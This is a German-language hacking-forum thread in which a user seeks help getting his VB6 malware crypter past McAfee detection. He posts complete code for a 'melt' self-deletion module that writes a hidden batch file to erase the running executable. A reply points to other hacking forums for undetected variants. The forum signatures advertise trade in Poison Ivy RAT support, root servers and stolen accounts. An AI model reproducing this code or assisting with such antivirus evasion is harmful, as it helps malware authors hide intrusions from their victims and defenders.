Hi also ich hab da nen problem ich hab in nem programm ne melt funktion aber durch die wird der crypter detectet er is fud runtime scantime aber ich versteh net wie ich mcaffe wegbekommen soll verwende das selfkill modul von 539 bot das hatte die besten scan ergebnisse aber ich häng wie gesagt an mcaffe rum und die melt funktion will ich auch nicht rausnehmen bitte um hilfe biete von mir aus auch ggl
Sprache: VB6
Ergebnis 1 bis 3 von 3
Thema: problem mit mcaffe
-
04.09.2008, 03:56 #1Anfänger
- Registriert seit
- 01.08.2008
- Beiträge
- 29
problem mit mcaffe
----------------------------------------------
[B] Np toolz
[B] Rootserver
[B] Poison ivy Support
[B] Sonstiges (Accounts usw)
[S] Np toolz
[S] Accounts
[S] Sonstiges
[S] PSC
----------------------------------------------
Einfach PM schreiben
----------------------------------------------
-
04.09.2008, 04:26 #2Trojaner
- Registriert seit
- 19.01.2008
- Beiträge
- 83
könntest du vielleicht den melt source posten...
hab grad nen bisken gesucht
http://advantage-designs.net/forum/i...?showtopic=227
http://www.rohitab.com/discuss/index...howtopic=24746
http://hackhound.org/forum/index.php?topic=3218.0
http://hackhound.org/forum/index.php?topic=805.0
http://hackhound.org/forum/index.php?topic=621.0
hoffe ist was bei was nicht detected ist
Zitat von EkoBienow
zu geil^^ Zitat von cocooo
-
04.09.2008, 04:41 #3Anfänger
- Registriert seit
- 01.08.2008
- Beiträge
- 29
Code:Option Explicit Private Befehl$ Private MeFile$ Private BatFile$ Private Comment As Boolean Private Declare Function CharToOemA Lib "user32.dll" (ByVal _ lpszSrc As String, ByVal lpszDst As String) As Long Public Sub Selfdestruction() Dim ff As Long ff = FreeFile 'verhindert das auftauchen von "\\" im Dateinamen: If Len(App.Path) > 3 Then 'In einem Unterverzeichnis MeFile = App.Path & "\" & App.EXEName & ".exe" BatFile = App.Path & "\" & "Kill.bat" Else 'Direkt auf der Festplatte MeFile = App.Path & App.EXEName & ".exe" BatFile = App.Path & "Kill.bat" End If 'falls Attribute (wie z.B. Schreibschutz) 'gesetzt sind, werden diese augeschaltet If GetAttr(MeFile) Then SetAttr MeFile, 0 'Konvertiert Dateinamen zu ANSI-Code Call CharToOemA(MeFile, MeFile) If Comment Then Befehl = "@echo off" & vbCrLf 'verhindert Anzeigen der Befehle im DOS-Fenster Befehl = Befehl & ":Marke" & vbCrLf Befehl = Befehl & "Del " & Chr(34) & MeFile & Chr(34) & vbCrLf 'Befehl zum Zerstören der EXE Befehl = Befehl & "If Exist " & Chr(34) & MeFile & Chr(34) & " Goto Marke" & vbCrLf 'falls EXE noch vorhanden (Zugriff verweigert) --> zurück zu :Marke If Comment Then Befehl = Befehl & "echo." & vbCrLf & "echo EXE wurde zerstoert" & vbCrLf & "echo." & vbCrLf 'gibt Text aus Befehl = Befehl & "del " & Chr(34) & BatFile & Chr(34) 'Bat-Datei zerstört sich selbst 'Bat-Datei muss binär erstellt werden Open BatFile For Binary As #ff Put #ff, , Befehl Close #ff If Not Comment Then Shell BatFile, vbHide Else Shell BatFile, vbNormalFocus End If End End Sub
hier das das modul was ich verwende mein crypter wir dnur von diesem mcaffe erkannt voll der scheis weis halt net woran da sleigt also in welchem abschnitt des moduls----------------------------------------------
[B] Np toolz
[B] Rootserver
[B] Poison ivy Support
[B] Sonstiges (Accounts usw)
[S] Np toolz
[S] Accounts
[S] Sonstiges
[S] PSC
----------------------------------------------
Einfach PM schreiben
----------------------------------------------
Zitieren
